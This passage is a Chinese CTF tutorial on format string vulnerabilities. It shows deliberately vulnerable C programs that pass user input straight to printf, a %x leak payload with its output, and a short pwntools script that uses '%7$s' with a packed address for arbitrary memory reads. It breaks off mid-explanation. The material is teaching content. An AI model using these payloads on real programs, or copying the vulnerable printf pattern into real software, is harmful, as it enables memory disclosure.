学习资料:
https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit/ https://veritas501.space/2017/04/28/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/#more
具体的基础的学习知识点,上面两个链接应该都有
先粗略讲一下格式化字符串漏洞有哪些危害吧
#include <stdio.h>
int main(void)
{
char a[100];
scanf("%s",a);
printf(a);
return 0;
}
这程序我们输入AAAA%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x
输出:AAAA1,d1f77790,a,0,d217f700,41414141,78252c78,252c7825,2c78252c,78252c78,6f736476
可以看到栈的地址被我们泄露了,是不是有点迷,换个例子看一下
#include <stdio.h>
int main() {
char s[100];
int a = 1, b = 0x22222222, c = -1;
scanf("%s", s);
printf("%08x.%08x.%08x.%s\n", a, b, c, s);
printf(s);
return 0;
}
我们先正经的输入字符串,结果如下,好像没什么问题
换个输入看看
是不是惊呆了,其实原理和上一个例子是一样的,就是利用printf是可变参数的函数,被调用者无法知道在函数调用之前到底有多少参数被压入栈帧当中
当然以上只是泄露,我们同时还是实现实现任意地址读
这里我们要了解printf函数的另一个操作m$
具体是啥可以给个链接:https://blog.csdn.net/ai_book/article/details/17881939
总之输出参数列表中的第m个参数,拿第一个例子继续做实验
可以看到字符串AAAA的据开头的偏移量为6,知道偏移量之后,我们试着把elf文件的开头信息读出来
exp
from pwn import *
context.log_level = 'debug'
cn = process('./test2')
cn.sendline("%7$s"+p64(0x08048000))
print cn.recv()
结果如下
我们首先知道了%7$s这个字符串会被放在%6$s,然后